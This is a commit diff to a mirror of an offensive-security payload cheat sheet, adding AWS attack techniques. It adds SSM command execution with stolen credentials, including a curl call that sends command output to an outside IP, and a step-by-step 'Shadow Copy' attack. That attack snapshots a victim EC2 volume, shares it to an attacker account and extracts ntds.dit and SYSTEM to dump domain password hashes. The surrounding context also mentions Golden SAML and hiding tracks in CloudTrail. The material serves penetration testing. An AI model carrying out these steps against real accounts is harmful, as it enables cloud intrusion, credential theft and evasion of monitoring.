mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-11 22:15:26 +00:00
AWS SSM + Shadow copy attack
This commit is contained in:
parent
5d87804f71
commit
1f3a94ba88
@ -18,6 +18,7 @@
|
|||||||
* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
|
* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
|
||||||
* [AWS - SSM - Command execution](#aws---ssm---command-execution)
|
* [AWS - SSM - Command execution](#aws---ssm---command-execution)
|
||||||
* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
|
* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
|
||||||
|
* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
|
||||||
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
|
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
|
||||||
* [PenTest:IAMUser/KaliLinux](#)
|
* [PenTest:IAMUser/KaliLinux](#)
|
||||||
* [PenTest:IAMUser/ParrotLinux](#)
|
* [PenTest:IAMUser/ParrotLinux](#)
|
||||||
@ -394,10 +395,24 @@ $ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
|
|||||||
|
|
||||||
## AWS - SSM - Command execution
|
## AWS - SSM - Command execution
|
||||||
|
|
||||||
|
:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
|
||||||
|
|
||||||
|
SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
|
||||||
|
* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
|
||||||
|
* Windows Server 2016 and 2019
|
||||||
|
* Amazon Linux
|
||||||
|
* Amazon Linux 2
|
||||||
|
* Ubuntu Server 16.04
|
||||||
|
* Ubuntu Server 18.04
|
||||||
|
* Amazon ECS-Optimized
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
||||||
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
||||||
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
||||||
|
|
||||||
|
e.g:
|
||||||
|
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
|
||||||
```
|
```
|
||||||
|
|
||||||
## AWS - Golden SAML Attack
|
## AWS - Golden SAML Attack
|
||||||
@ -419,6 +434,28 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file
|
|||||||
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
|
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## AWS - Shadow Copy attack
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
* EC2:CreateSnapshot
|
||||||
|
* CloudCopy - https://github.com/Static-Flow/CloudCopy
|
||||||
|
|
||||||
|
1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
|
||||||
|
2. Run `"Describe-Instances"` and show in list for attacker to select
|
||||||
|
3. Run `"Create-Snapshot"` on volume of selected instance
|
||||||
|
4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account
|
||||||
|
5. Load AWS CLI with Attacker Credentials
|
||||||
|
6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot
|
||||||
|
7. Ssh run `"sudo mkdir /windows"`
|
||||||
|
8. Ssh run `"sudo mount /dev/xvdf1 /windows/"`
|
||||||
|
9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"`
|
||||||
|
10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"`
|
||||||
|
11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"`
|
||||||
|
12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"`
|
||||||
|
13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
|
||||||
|
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||||||
|
|
||||||
|
|
||||||
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
||||||
|
|
||||||
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
||||||
|
Loading…
Reference in New Issue
Block a user